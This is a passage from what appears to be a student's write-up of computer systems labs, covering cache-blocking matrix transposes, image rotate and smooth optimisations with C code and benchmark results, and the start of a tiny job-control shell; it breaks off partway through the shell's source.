| 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | row 1
---------------------------------------
| 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | row 2
---------------------------------------
| 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | row 3
---------------------------------------
| 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | row 4
---------------------------------------
| 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | row 5
---------------------------------------
| 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | row 6
---------------------------------------
| 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | row 7
---------------------------------------
| 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | row 8
---------------------------------------
.......................................
---------------------------------------
| 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | row 61
---------------------------------------
| 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | row 62
---------------------------------------
| 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | row 63
---------------------------------------
| 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | row 64
---------------------------------------

The diagram shows that 8*8 blocking only leverages 4 distinct caches and repeats every 4 rows. Let's see how it works when we use 8*8 blocking.

A Read Cache Set Miss or Hit B Write Cache Set Miss or Hit
A[0][0] 0 M B[0][0] 0 M
A[0][1] 0 M B[1][0] 8 M
A[0][2] 0 H B[2][0] 16 M
A[0][3] 0 H B[3][0] 24 M
A[0][4] 0 H B[4][0] 0 M
A[0][5] 0 M B[5][0] 8 M
A[0][6] 0 H B[6][0] 16 M
A[0][7] 0 H B[7][0] 24 M

Obviously the biggest problem is when we write the last 4 rows of matrix , we overwrite the previously loaded blocks, i.e., row 0 to row 3. In this case, writes to matrix will have a miss rate of 100%.

What about using a 4*4 blocking strategy? Let's look at it!

A Read Cache Set Miss or Hit B Write Cache Set Miss or Hit
A[0][0] 0 M B[0][0] 0 M
A[0][1] 0 M B[1][0] 8 M
A[0][2] 0 H B[2][0] 16 M
A[0][3] 0 H B[3][0] 24 M
A[1][0] 8 M B[0][1] 0 M
A[1][1] 8 H B[1][1] 8 M
A[1][2] 8 M B[2][1] 16 H
A[1][3] 8 H B[3][1] 24 H
A[2][0] 16 M B[0][2] 0 H
A[2][1] 16 H B[1][2] 8 M
A[2][2] 16 H B[2][2] 16 M
A[2][3] 16 M B[3][2] 24 H
A[3][0] 24 M B[0][3] 0 H
A[3][1] 24 H B[1][3] 8 H
A[3][2] 24 H B[2][3] 16 M
A[3][3] 24 H B[3][3] 24 M

Awesome! We significantly improved the miss rate. However... the new code produces caches misses 1702, which is still beyond our goal 1300. This is because we're only using 4 integers per block, and results in a 50% waste of the block size. We'd like to combine reading 8 integers each time and making full use of them to construct 4*4 matrices.

In order to do this, we still load each 8 integers for each block (i.e., each row of matrix ) into local variables. Then we only use 4 of each time, and store the rest 4 integers somewhere else. Where should we place the remaining 4 integers? Recall the cache layout for a 64*64 matrix: if we divide the 8*8 blocking into 4 sub-blocks, each of which is 4*4, we will be able to place the remaining four integers in the adjacent sub-block, in the same order the first 4 integers are written into to avoid cache conflict.

Maybe it's bettet to take a look at the code below:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
int i, j, block_i, block_j;
int Temp[8];

for (i = 0; i < N; i += 8)
for (j = 0; j < M; j +=8) {
// 1. For first four rows of A
for (block_i = i; block_i < i + 4; ++block_i) {
// 2. Load full cache block -- 8 integers into local vars
for (block_j = j; block_j < j + 8; ++block_j) {
Temp[block_j - j] = A[block_i][block_j];
}
// 3. Fill the top-left 4*4 sub-block
for (block_j = j; block_j < j + 4; ++block_j) {
B[block_j][block_i] = Temp[block_j - j];
}
// 4. Store the rest four integers into the top-right 4*4 sub-block
// so that we avoid cache conflict
for (block_j = j; block_j < j + 4; ++block_j) {
B[block_j][block_i + 4] = Temp[block_j - j + 4];
}
}
// 5. For the remaining four rows of A
for (block_i = i + 4; block_i < i + 8; ++block_i) {
// 6. Load from the top-right sub-block into local vars by row
for (block_j = i + 4; block_j < i + 8; ++block_j) {
Temp[block_j - i - 4] = B[j + block_i - i - 4][block_j];
}
// 7. Fill the top-right sub-block by row
for (block_j = i + 4; block_j < i + 8; ++block_j) {
B[j + block_i - i - 4][block_j] = A[block_j][j + block_i - i - 4];
}
// 8. Fill the bottom-left sub-block by row
for (block_j = i; block_j < i + 4; ++block_j) {
B[j + block_i - i][block_j] = Temp[block_j - i];
}
// 9. Fill the bottom-right sub-block by row
for (block_j = i + 4; block_j < i + 8; ++block_j) {
B[j + block_i - i][block_j] = A[block_j][j + block_i - i];
}
}
}

We are always operating on a 4*4 sub-block each time switching between matrix and . By storing by row instead of by column, we can minimize the number of conflict misses at each iteration.

For the last problem, note that 61 and 67 are both prime numbers, so the cache layout for this matrix is irregular. For this reason, we simply adopt standard blocking. The remaining question is, what's the blocking's size? Just fail and try!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
int i, j, block_i, block_j;
int Temp[8];

for (i = 0; i < 64; i += 16)
for (j = 0; j < 56; j += 8) {
for (block_i = i; block_i < i + 16; ++block_i) {
for (block_j = j; block_j < j + 8; ++block_j) {
Temp[block_j - j] = A[block_i][block_j];
}
for (block_j = j; block_j < j + 8; ++block_j) {
B[block_j][block_i] = Temp[block_j - j];
}
}
}

for (i = 64; i < 67; ++i)
for (j = 0; j < 61; ++j) {
B[j][i] = A[i][j];
}

for (i = 0; i < 64; ++i)
for (j = 56; j < 61; ++j) {
B[j][i] = A[i][j];
}

We use 16*8 blocking and the miss count is 1907.

Let's go back to the question: where does the miss come from? The answer is: conflict miss, the miss where the same cache block is overwritten. To deal with this problem, we can either use different cache blocks, or designing some mechanism to reduce the miss count if it's not avoidable.

The following figure shows how matrix is transformed into matrix . Matrix is partitioned by multiple blocks and these blocks are indexed from 1 to 16. Index in matrix is transformed to index in matrix . Conflict blocks are marked in color orange and non-conflict blocks are marked green.

Our goal is to minimize the conflict misses taking place in orange blocks. For matrices, we make use of local variables. For matrices, we have to employ some tricks to reduce conflicts as the cache layout becomes much more complicated.

Lab 5: Performance Lab

In this lab, you are prompted to optimize the performance of a rotation function and a convolution function for a 2D image (matrix). Basically, we will leverage the following optimization techniques: code motion, function inlining, blocking, loop unrolling, memory load reduction, etc.

Optimizing Rotation

I tried the following versions of function rotation:

  • naive_rotate: iterate over all rows and columns in order to rotate each element.
  • rotate_1: 8 * 8 blocking plus loop unrolling.
  • rotate_2: 8 * 8 blocking, loop unrolling, plus temporary caching.
  • rotate_3: 8 * 8 blocking, loop unrolling, plus marco RIDX reduction.
  • rotate_4: 4 * 4 blocking, loop unrolling, plus marco RIDX reduction.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
void naive_rotate(int dim, pixel *src, pixel *dst) 
{
int i, j;

for (i = 0; i < dim; i++)
for (j = 0; j < dim; j++)
dst[RIDX(dim-1-j, i, dim)] = src[RIDX(i, j, dim)];
}

void rotate_1(int dim, pixel *src, pixel *dst)
{
int i, j, k;

for (i = 0; i < dim; i += 8)
for (j = 0; j < dim; j += 8)
for (k = i; k < i + 8; ++k) {
dst[RIDX(dim - 1 - j, k, dim)] = src[RIDX(k, j + 0, dim)];
dst[RIDX(dim - 2 - j, k, dim)] = src[RIDX(k, j + 1, dim)];
dst[RIDX(dim - 3 - j, k, dim)] = src[RIDX(k, j + 2, dim)];
dst[RIDX(dim - 4 - j, k, dim)] = src[RIDX(k, j + 3, dim)];
dst[RIDX(dim - 5 - j, k, dim)] = src[RIDX(k, j + 4, dim)];
dst[RIDX(dim - 6 - j, k, dim)] = src[RIDX(k, j + 5, dim)];
dst[RIDX(dim - 7 - j, k, dim)] = src[RIDX(k, j + 6, dim)];
dst[RIDX(dim - 8 - j, k, dim)] = src[RIDX(k, j + 7, dim)];
}
}

void rotate_2(int dim, pixel *src, pixel *dst)
{
int i, j, k;
pixel Temp[8];

for (i = 0; i < dim; i += 8)
for (j = 0; j < dim; j += 8) {
for (k = i; k < i + 8; ++k) {
Temp[0] = src[RIDX(k, j + 0, dim)];
Temp[1] = src[RIDX(k, j + 1, dim)];
Temp[2] = src[RIDX(k, j + 2, dim)];
Temp[3] = src[RIDX(k, j + 3, dim)];
Temp[4] = src[RIDX(k, j + 4, dim)];
Temp[5] = src[RIDX(k, j + 5, dim)];
Temp[6] = src[RIDX(k, j + 6, dim)];
Temp[7] = src[RIDX(k, j + 7, dim)];
dst[RIDX(dim - 1 - j, k, dim)] = Temp[0];
dst[RIDX(dim - 2 - j, k, dim)] = Temp[1];
dst[RIDX(dim - 3 - j, k, dim)] = Temp[2];
dst[RIDX(dim - 4 - j, k, dim)] = Temp[3];
dst[RIDX(dim - 5 - j, k, dim)] = Temp[4];
dst[RIDX(dim - 6 - j, k, dim)] = Temp[5];
dst[RIDX(dim - 7 - j, k, dim)] = Temp[6];
dst[RIDX(dim - 8 - j, k, dim)] = Temp[7];
}
}
}

void rotate_3(int dim, pixel *src, pixel *dst)
{
int i, j, k, d_src, d_dst;

for (i = 0; i < dim; i += 8)
for (j = 0; j < dim; j += 8) {
for (k = i; k < i + 8; ++k) {
d_src = RIDX(k, j, dim);
d_dst = RIDX(dim - 1 - j, k, dim);
dst[d_dst - 0 * dim] = src[d_src + 0];
dst[d_dst - 1 * dim] = src[d_src + 1];
dst[d_dst - 2 * dim] = src[d_src + 2];
dst[d_dst - 3 * dim] = src[d_src + 3];
dst[d_dst - 4 * dim] = src[d_src + 4];
dst[d_dst - 5 * dim] = src[d_src + 5];
dst[d_dst - 6 * dim] = src[d_src + 6];
dst[d_dst - 7 * dim] = src[d_src + 7];
}
}
}

void rotate_4(int dim, pixel *src, pixel *dst)
{
int i, j, k, d_src, d_dst;

for (i = 0; i < dim; i += 4)
for (j = 0; j < dim; j += 4) {
for (k = i; k < i + 4; ++k) {
d_src = RIDX(k, j, dim);
d_dst = RIDX(dim - 1 - j, k, dim);
dst[d_dst - 0 * dim] = src[d_src + 0];
dst[d_dst - 1 * dim] = src[d_src + 1];
dst[d_dst - 2 * dim] = src[d_src + 2];
dst[d_dst - 3 * dim] = src[d_src + 3];
}
}
}

Results are (note that your results may differ from here because of machine difference):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
Rotate: Version = rotate_0: naive implementation:
Dim 64 128 256 512 1024 Mean
Your CPEs 1.1 1.5 3.3 4.7 6.6
Baseline CPEs 14.7 40.1 46.4 65.9 94.5
Speedup 13.3 26.0 13.9 14.0 14.3 15.7

Rotate: Version = rotate_1: 8*8 blocking + loop unrolling:
Dim 64 128 256 512 1024 Mean
Your CPEs 1.2 1.2 1.3 1.7 1.7
Baseline CPEs 14.7 40.1 46.4 65.9 94.5
Speedup 12.5 33.1 36.8 39.8 55.6 32.0

Rotate: Version = rotate_2: 8*8 blocking + loop unrolling + temporary caching:
Dim 64 128 256 512 1024 Mean
Your CPEs 2.5 2.5 2.5 3.0 3.3
Baseline CPEs 14.7 40.1 46.4 65.9 94.5
Speedup 5.9 15.8 18.2 22.1 28.6 16.1

Rotate: Version = rotate_3: 8*8 blocking + loop unrolling + marco RIDX reduced:
Dim 64 128 256 512 1024 Mean
Your CPEs 1.2 1.2 1.2 1.4 2.1
Baseline CPEs 14.7 40.1 46.4 65.9 94.5
Speedup 12.7 32.8 38.1 46.6 44.2 31.8

Rotate: Version = rotate_4: 4*4 blocking + loop unrolling + marco RIDX reduced:
Dim 64 128 256 512 1024 Mean
Your CPEs 1.2 1.5 1.5 2.6 4.2
Baseline CPEs 14.7 40.1 46.4 65.9 94.5
Speedup 12.1 26.7 30.6 25.3 22.7 22.4

Summary of Your Best Scores:
Rotate: 32.0 (rotate_1: 8*8 blocking + loop unrolling)

8 * 8 is the best blocking strategy and loop unrolling plays a critical role in optimization.

Optimizing Convolution

We compare the following convolution methods:

  • naive_smooth: naive implementation of convolution.
  • smooth_1: inlining all function calls of naive_smooth.
  • smooth_2: separating 4 corners and 4 boundaries.
  • smooth_3: separating corners/boundaries, plus loop unrolling.

Code for naive_smooth and smooth_1:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
void naive_smooth(int dim, pixel *src, pixel *dst) 
{
int i, j;

for (i = 0; i < dim; i++)
for (j = 0; j < dim; j++)
dst[RIDX(i, j, dim)] = avg(dim, i, j, src);
}

void smooth_1(int dim, pixel *src, pixel *dst)
{
int i, j, block_i, block_j, block_i_start, block_i_end, block_j_start, block_j_end;
int sum_red, sum_blue, sum_green, n;
pixel temp;

for (i = 0; i < dim; i++)
for (j = 0; j < dim; j++) {
sum_red = 0;
sum_blue = 0;
sum_green = 0;

block_i_start = max(i - 1, 0);
block_i_end = min(i + 1, dim - 1);
block_j_start = max(j - 1, 0);
block_j_end = min(j + 1, dim - 1);
n = (block_i_end - block_i_start + 1) * (block_j_end - block_j_start + 1);

for (block_i = block_i_start; block_i <= block_i_end; block_i++)
for (block_j = block_j_start; block_j <= block_j_end; block_j++) {
temp = src[(RIDX(block_i, block_j, dim))];
sum_red += (int) temp.red;
sum_blue += (int) temp.blue;
sum_green += (int) temp.green;
}

temp.red = sum_red / n;
temp.green = sum_green / n;
temp.blue = sum_blue / n;
dst[RIDX(i, j, dim)] = temp;
}
}

Code for smooth_2:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
void set_corners(int dim, pixel* src, pixel* dst)
{
// Top left
int sum_red = 0, sum_blue = 0, sum_green = 0;
sum_red += src[0].red; sum_blue += src[0].blue; sum_green += src[0].green;
sum_red += src[1].red; sum_blue += src[1].blue; sum_green += src[1].green;
sum_red += src[dim].red; sum_blue += src[dim].blue; sum_green += src[dim].green;
sum_red += src[dim + 1].red; sum_blue += src[dim + 1].blue; sum_green += src[dim + 1].green;
dst[0].red = sum_red / 4;
dst[0].blue = sum_blue / 4;
dst[0].green = sum_green / 4;

// Top right
sum_red = 0, sum_blue = 0, sum_green = 0;
sum_red += src[dim - 2].red; sum_blue += src[dim - 2].blue; sum_green += src[dim - 2].green;
sum_red += src[dim - 1].red; sum_blue += src[dim - 1].blue; sum_green += src[dim - 1].green;
sum_red += src[2 * dim - 2].red; sum_blue += src[2 * dim - 2].blue; sum_green += src[2 * dim - 2].green;
sum_red += src[2 * dim - 1].red; sum_blue += src[2 * dim - 1].blue; sum_green += src[2 * dim - 1].green;
dst[dim - 1].red = sum_red / 4;
dst[dim - 1].blue = sum_blue / 4;
dst[dim - 1].green = sum_green / 4;

// Bottom left
sum_red = 0, sum_blue = 0, sum_green = 0;
sum_red += src[dim * (dim - 2)].red; sum_blue += src[dim * (dim - 2)].blue; sum_green += src[dim * (dim - 2)].green;
sum_red += src[dim * (dim - 2) + 1].red; sum_blue += src[dim * (dim - 2) + 1].blue; sum_green += src[dim * (dim - 2) + 1].green;
sum_red += src[dim * (dim - 1)].red; sum_blue += src[dim * (dim - 1)].blue; sum_green += src[dim * (dim - 1)].green;
sum_red += src[dim * (dim - 1) + 1].red; sum_blue += src[dim * (dim - 1) + 1].blue; sum_green += src[dim * (dim - 1) + 1].green;
dst[dim * (dim - 1)].red = sum_red / 4;
dst[dim * (dim - 1)].blue = sum_blue / 4;
dst[dim * (dim - 1)].green = sum_green / 4;

// Bottom right
sum_red = 0, sum_blue = 0, sum_green = 0;
sum_red += src[dim * (dim - 1) - 2].red; sum_blue += src[dim * (dim - 1) - 2].blue; sum_green += src[dim * (dim - 1) - 2].green;
sum_red += src[dim * (dim - 1) - 1].red; sum_blue += src[dim * (dim - 1) - 1].blue; sum_green += src[dim * (dim - 1) - 1].green;
sum_red += src[dim * dim - 2].red; sum_blue += src[dim * dim - 2].blue; sum_green += src[dim * dim - 2].green;
sum_red += src[dim * dim - 1].red; sum_blue += src[dim * dim - 1].blue; sum_green += src[dim * dim - 1].green;
dst[dim * dim - 1].red = sum_red / 4;
dst[dim * dim - 1].blue = sum_blue / 4;
dst[dim * dim - 1].green = sum_green / 4;
}

void set_boundary_top(int dim, pixel* src, pixel* dst)
{
int sum_red, sum_blue, sum_green;

for (int j = 1; j < dim - 1; j++) {
sum_red = sum_blue = sum_green = 0;

sum_red += src[j - 1].red; sum_blue += src[j - 1].blue; sum_green += src[j - 1].green;
sum_red += src[j].red; sum_blue += src[j].blue; sum_green += src[j].green;
sum_red += src[j + 1].red; sum_blue += src[j + 1].blue; sum_green += src[j + 1].green;
sum_red += src[j + dim - 1].red; sum_blue += src[j + dim - 1].blue; sum_green += src[j + dim - 1].green;
sum_red += src[j + dim].red; sum_blue += src[j + dim].blue; sum_green += src[j + dim].green;
sum_red += src[j + dim + 1].red; sum_blue += src[j + dim + 1].blue; sum_green += src[j + dim + 1].green;

dst[j].red = sum_red / 6;
dst[j].blue = sum_blue / 6;
dst[j].green = sum_green / 6;
}
}

void set_boundary_bottom(int dim, pixel* src, pixel* dst)
{

int sum_red, sum_blue, sum_green, idx;
const int _dim = dim * (dim - 1);

for (int j = 1; j < dim - 1; j++) {
sum_red = sum_blue = sum_green = 0;

sum_red += src[_dim + j - 1].red; sum_blue += src[_dim + j - 1].blue; sum_green += src[_dim + j - 1].green;
sum_red += src[_dim + j].red; sum_blue += src[_dim + j].blue; sum_green += src[_dim + j].green;
sum_red += src[_dim + j + 1].red; sum_blue += src[_dim + j + 1].blue; sum_green += src[_dim + j + 1].green;
sum_red += src[_dim + j - dim - 1].red; sum_blue += src[_dim + j - dim - 1].blue; sum_green += src[_dim + j - dim - 1].green;
sum_red += src[_dim + j - dim].red; sum_blue += src[_dim + j - dim].blue; sum_green += src[_dim + j - dim].green;
sum_red += src[_dim + j - dim + 1].red; sum_blue += src[_dim + j - dim + 1].blue; sum_green += src[_dim + j - dim + 1].green;

idx = _dim + j;
dst[idx].red = sum_red / 6;
dst[idx].blue = sum_blue / 6;
dst[idx].green = sum_green / 6;
}
}

void set_boundary_left(int dim, pixel* src, pixel* dst)
{
int sum_red, sum_blue, sum_green, idx;

for (int i = 1; i < dim - 1; i++) {
sum_red = sum_blue = sum_green = 0;

sum_red += src[(i - 1) * dim].red; sum_blue += src[(i - 1) * dim].blue; sum_green += src[(i - 1) * dim].green;
sum_red += src[(i - 1) * dim + 1].red; sum_blue += src[(i - 1) * dim + 1].blue; sum_green += src[(i - 1) * dim + 1].green;
sum_red += src[i * dim].red; sum_blue += src[i * dim].blue; sum_green += src[i * dim].green;
sum_red += src[i * dim + 1].red; sum_blue += src[i * dim + 1].blue; sum_green += src[i * dim + 1].green;
sum_red += src[(i + 1) * dim].red; sum_blue += src[(i + 1) * dim].blue; sum_green += src[(i + 1) * dim].green;
sum_red += src[(i + 1) * dim + 1].red; sum_blue += src[(i + 1) * dim + 1].blue; sum_green += src[(i + 1) * dim + 1].green;

idx = i * dim;
dst[idx].red = sum_red / 6;
dst[idx].blue = sum_blue / 6;
dst[idx].green = sum_green / 6;
}
}

void set_boundary_right(int dim, pixel* src, pixel* dst)
{

int sum_red, sum_blue, sum_green, idx;

for (int i = 1; i < dim - 1; i++) {
sum_red = sum_blue = sum_green = 0;

sum_red += src[i * dim - 1].red; sum_blue += src[i * dim - 1].blue; sum_green += src[i * dim - 1].green;
sum_red += src[i * dim - 2].red; sum_blue += src[i * dim - 2].blue; sum_green += src[i * dim - 2].green;
sum_red += src[(i + 1) * dim - 1].red; sum_blue += src[(i + 1) * dim - 1].blue; sum_green += src[(i + 1) * dim - 1].green;
sum_red += src[(i + 1) * dim - 2].red; sum_blue += src[(i + 1) * dim - 2].blue; sum_green += src[(i + 1) * dim - 2].green;
sum_red += src[(i + 2) * dim - 1].red; sum_blue += src[(i + 2) * dim - 1].blue; sum_green += src[(i + 2) * dim - 1].green;
sum_red += src[(i + 2) * dim - 2].red; sum_blue += src[(i + 2) * dim - 2].blue; sum_green += src[(i + 2) * dim - 2].green;

idx = (i + 1) * dim - 1;
dst[idx].red = sum_red / 6;
dst[idx].blue = sum_blue / 6;
dst[idx].green = sum_green / 6;
}
}

void set_inner(int dim, pixel* src, pixel* dst)
{
int i, j, block_i, block_j, idx;
int sum_red, sum_blue, sum_green;

for (i = 1; i < dim - 1; i++)
for (j = 1; j < dim - 1; j++) {
sum_red = sum_blue = sum_green = 0;

for (block_i = i - 1; block_i <= i + 1; block_i++)
for (block_j = j - 1; block_j <= j + 1; block_j++) {
idx = RIDX(block_i, block_j, dim);
sum_red += src[idx].red;
sum_blue += src[idx].blue;
sum_green += src[idx].green;
}

idx = RIDX(i, j, dim);
dst[idx].red = sum_red / 9;
dst[idx].blue = sum_blue / 9;
dst[idx].green = sum_green / 9;
}
}

void smooth_2(int dim, pixel *src, pixel *dst)
{
set_corners(dim, src, dst);
set_boundary_top(dim, src, dst);
set_boundary_bottom(dim, src, dst);
set_boundary_left(dim, src, dst);
set_boundary_right(dim, src, dst);
set_inner(dim, src, dst);
}

Code for smooth_3:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
void set_inner_unrolling(int dim, pixel* src, pixel* dst)
{
int i, j, idx;
int sum_red, sum_blue, sum_green;

for (i = 1; i < dim - 1; i++)
for (j = 1; j < dim - 1; j++) {
sum_red = sum_blue = sum_green = 0;

idx = RIDX(i - 1, j - 1, dim); sum_red += src[idx].red; sum_blue += src[idx].blue; sum_green += src[idx].green;
idx = RIDX(i - 1, j , dim); sum_red += src[idx].red; sum_blue += src[idx].blue; sum_green += src[idx].green;
idx = RIDX(i - 1, j + 1, dim); sum_red += src[idx].red; sum_blue += src[idx].blue; sum_green += src[idx].green;
idx = RIDX(i , j - 1, dim); sum_red += src[idx].red; sum_blue += src[idx].blue; sum_green += src[idx].green;
idx = RIDX(i , j , dim); sum_red += src[idx].red; sum_blue += src[idx].blue; sum_green += src[idx].green;
idx = RIDX(i , j + 1, dim); sum_red += src[idx].red; sum_blue += src[idx].blue; sum_green += src[idx].green;
idx = RIDX(i + 1, j - 1, dim); sum_red += src[idx].red; sum_blue += src[idx].blue; sum_green += src[idx].green;
idx = RIDX(i + 1, j , dim); sum_red += src[idx].red; sum_blue += src[idx].blue; sum_green += src[idx].green;
idx = RIDX(i + 1, j + 1, dim); sum_red += src[idx].red; sum_blue += src[idx].blue; sum_green += src[idx].green;

idx = RIDX(i, j, dim);
dst[idx].red = sum_red / 9;
dst[idx].blue = sum_blue / 9;
dst[idx].green = sum_green / 9;
}
}

void smooth_3(int dim, pixel *src, pixel *dst)
{
set_corners(dim, src, dst);
set_boundary_top(dim, src, dst);
set_boundary_bottom(dim, src, dst);
set_boundary_left(dim, src, dst);
set_boundary_right(dim, src, dst);
set_inner_unrolling(dim, src, dst);

}

Results:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
Smooth: Version = smooth_0: naive implementation:
Dim 32 64 128 256 512 Mean
Your CPEs 16.0 15.7 16.0 16.0 15.7
Baseline CPEs 695.0 698.0 702.0 717.0 722.0
Speedup 43.4 44.4 44.0 44.9 46.0 44.5

Smooth: Version = smooth_1: no function calls:
Dim 32 64 128 256 512 Mean
Your CPEs 16.2 15.7 16.0 15.5 15.7
Baseline CPEs 695.0 698.0 702.0 717.0 722.0
Speedup 43.0 44.4 43.8 46.3 46.0 44.7

Smooth: Version = smooth_2: boundary separation:
Dim 32 64 128 256 512 Mean
Your CPEs 12.3 11.9 11.4 12.0 12.1
Baseline CPEs 695.0 698.0 702.0 717.0 722.0
Speedup 56.5 58.6 61.6 59.9 59.7 59.2

Smooth: Version = smooth_3: boundary separtion + loop unrolling:
Dim 32 64 128 256 512 Mean
Your CPEs 7.3 7.3 7.7 7.3 7.5
Baseline CPEs 695.0 698.0 702.0 717.0 722.0
Speedup 95.5 95.9 91.2 97.6 96.7 95.3

Summary of Your Best Scores:
Smooth: 95.3 (smooth_3: boundary separtion + loop unrolling)

Loop unrolling again significantly improves the performance of our function. You can also try some advanced convolution algorithms such as Winograd convolution and FFT if you're interested.

Lab 6: Shell Lab

You task is to write a simple shell that is able to perform foreground and background jobs. There is not too much you should be particularly careful of in this lab, but just to get yourself familiar with the following functions (operations):

  • In eval(char*), block SIGCHLD before fork() and unblock it afterward.
  • Use setpid(0, 0) in the child process to assign a unique group pid to it.
  • Pass -pid to the first argument of function kill() so that it operates on the group level.
  • Use sleep(), or better sigsuspend() in waitfg() to pause the main process waiting for foreground child process.
  • Use WIFSTOPPED, WIFSIGNALED and WIFEXITED in sigchld_handler to test the state of child processes: whether they are stopped, terminated or exited.
  • Use sigprocmask() to block all signals in sigchld_handler. This should be applied to sigint_handler and sigtstp_handler as well.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
/* 
* tsh - A tiny shell program with job control
*
* <Put your name and login ID here>
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <ctype.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <errno.h>

/* Misc manifest constants */
#define MAXLINE 1024 /* max line size */
#define MAXARGS 128 /* max args on a command line */
#define MAXJOBS 16 /* max jobs at any point in time */
#define MAXJID 1<<16 /* max job ID */

/* Job states */
#define UNDEF 0 /* undefined */
#define FG 1 /* running in foreground */
#define BG 2 /* running in background */
#define ST 3 /* stopped */

/*
* Jobs states: FG (foreground), BG (background), ST (stopped)
* Job state transitions and enabling actions:
* FG -> ST : ctrl-z
* ST -> FG : fg command
* ST -> BG : bg command
* BG -> FG : fg command
* At most 1 job can be in the FG state.
*/

/* Global variables */
extern char **environ; /* defined in libc */
char prompt[] = "tsh> "; /* command line prompt (DO NOT CHANGE) */
int verbose = 0; /* if true, print additional output */
int nextjid = 1; /* next job ID to allocate */
char sbuf[MAXLINE]; /* for composing sprintf messages */

struct job_t { /* The job struct */
pid_t pid; /* job PID */
